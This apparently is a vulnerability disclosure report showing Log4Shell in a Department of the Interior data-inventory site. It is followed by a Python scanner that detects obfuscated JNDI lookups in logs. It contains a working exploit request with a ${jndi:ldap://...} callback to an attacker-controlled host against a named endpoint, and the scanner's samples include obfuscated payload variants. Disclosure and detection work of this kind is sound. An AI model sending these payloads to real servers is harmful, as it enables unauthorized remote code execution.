Summary by aminei
Log4Shell in TopbraidEDG before version 7.0.4 when a security filter is turned off.
*.doi.gov
Web App
https://datainventory.doi.gov/explorer/tbl/swp
Log4Shell is exploitable in datainventory.doi.gov, which uses TopBraid EDG 7.0.3. This version is vulnerable to Log4Shell. I managed to find a vulnerable endpoint with a working proof of concept.
Base score: 10
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
First go to https://datainventory.doi.gov/explorer/ and click on "Enter explorer" to login as explorer.
Then set up a listener on port 22 on a server you control, using for instance netcat:
Once logged in as explorer, send the following request using a proxy such as BurpSuite:
POST /explorer/tbl/swp HTTP/1.1
Host: datainventory.doi.gov
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 155
Cookie: browserCompatibility=checked; JSESSIONID=YOUR_JSESSIONID_COOKIE
_viewClass=teamwork%3ACommentAndTaskCountService&resource=urn%3Ax-evn-master%3Awf_core_ent_nwcg_org&_base=http%3A%2F%2Frdfex.o${jndi:ldap://YOUR_IP:22}
Replace YOUR_IP in ${jndi:ldap://YOUR_IP:22} with an IP you control (and adjust Content-Length so it matches the final body) and send the request. The datainventory server will successfully make an outbound LDAP connection to your listener, which shows that the lookup was evaluated server-side.
I have not exploited the server further because it would lead to remote code execution. I don't feel comfortable doing so on a US Department of the Interior server without prior authorization.
A malicious attacker could obtain a shell via remote code execution on the server.
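The defensive counterpart to the request above: a small scanner that finds Log4j JNDI lookups in request bodies and log lines. This is an added example, not code from the report or from TopBraid; the sample lines are constructed (the report's own body with a placeholder IP, plus common obfuscated variants) and are not real captures. It goes beyond the report's plain ${jndi:ldap://...} form: it URL-decodes the input and collapses the ${lower:x}, ${upper:x} and ${...:-default} nesting that attackers use to evade naive string matching, then keys on the lookup syntax rather than on any particular scheme or callback port.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not real captures): the report's request body with a
# placeholder callback IP, three obfuscated variants, and one benign request.
SAMPLE_LINES = [
    "_viewClass=teamwork%3ACommentAndTaskCountService&resource=urn%3Ax-evn-master"
    "%3Awf_core_ent_nwcg_org&_base=http%3A%2F%2Frdfex.o${jndi:ldap://10.10.10.10:22}",
    # nested case lookups: ${lower:j}${upper:n}di evaluates to "jNdi"
    "GET /explorer/ HTTP/1.1 User-Agent: ${${lower:j}${upper:n}di:ldap://10.10.10.10:22/a}",
    # default-value syntax: ${::-j} evaluates to "j"
    "X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:rmi://10.10.10.10:1099/x}",
    # fully URL-encoded ${jndi:dns://10.10.10.10/canary}
    "q=%24%7Bjndi%3Adns%3A%2F%2F10.10.10.10%2Fcanary%7D",
    # benign request to the same endpoint
    "_viewClass=teamwork%3ACommentAndTaskCountService&resource=urn%3Ax-evn-master%3Awf_core",
]

# innermost ${...} lookup: a body that contains no further "${" or "}"
INNER = re.compile(r"\$\{([^${}]*)\}")
# a JNDI lookup and its scheme (ldap, ldaps, rmi, dns, ...)
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)


def _resolve(m: re.Match) -> str:
    """Evaluate one innermost lookup the way Log4j 2 would, for the forms used to
    hide the string "jndi". Anything else (including jndi: itself) is kept verbatim."""
    body = m.group(1)
    key, sep, rest = body.partition(":")
    low = key.lower()
    if low == "jndi":
        return m.group(0)  # this is what we are looking for; never rewrite it
    if low == "lower" and sep:
        return rest.lower()
    if low == "upper" and sep:
        return rest.upper()
    if ":-" in body:  # ${name:-default} with an unresolvable name yields default
        return body.split(":-", 1)[1]
    return m.group(0)


def normalize(line: str, rounds: int = 5) -> str:
    """URL-decode and collapse obfuscating lookups until the string stops changing."""
    for _ in range(rounds):
        prev = line
        line = unquote(line)
        line = INNER.sub(_resolve, line)
        if line == prev:
            break
    return line


def find_jndi(line: str):
    """Return the JNDI scheme found in a line, or None if the line is clean."""
    m = JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan_lines(lines):
    """Return (index, scheme, normalized lookup) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            end = norm.find("}", m.start())
            hits.append((i, m.group(1).lower(), norm[m.start():end + 1]))
    return hits


if __name__ == "__main__":
    for idx, scheme, lookup in scan_lines(SAMPLE_LINES):
        print(f"line {idx}: jndi scheme={scheme} lookup={lookup}")
```

Run it over proxy or web-server logs one line at a time; every hit is worth an alert regardless of whether the callback host or port (22 in the report) looks unusual, because the lookup syntax itself has no legitimate use in a request parameter. Blocking on the normalized form rather than the raw string is what makes the nested-lookup variants visible.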